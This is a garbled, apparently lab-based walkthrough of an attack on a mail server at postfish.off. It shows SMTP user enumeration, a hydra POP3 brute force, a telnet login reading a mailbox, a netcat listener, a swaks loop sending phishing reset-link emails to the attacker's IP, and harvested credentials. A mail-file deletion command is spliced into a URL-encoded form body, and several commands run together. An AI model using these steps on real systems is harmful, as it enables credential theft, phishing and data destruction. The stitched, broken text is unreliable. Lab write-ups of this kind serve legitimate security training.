Claire.Madison
Cmadison
ClaireM
Mike.Ross
Mross
MikeR
Brian.Moore
Bmoore
Brianmoore
Sarah.Lorem
SLorem
SarahL
Found some valid usernames
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE
Last updated
$ nmap -p25 --script=smtp* postfish.off
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.
8 queries in 2 seconds (4.0 queries / sec)
claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10 sales:sales$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets$ nc -lnvp 80$ for i in $(cat emails.txt); do swaks --to [email protected] --from [email protected] --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; donebrian.moore:EternaLSunshinE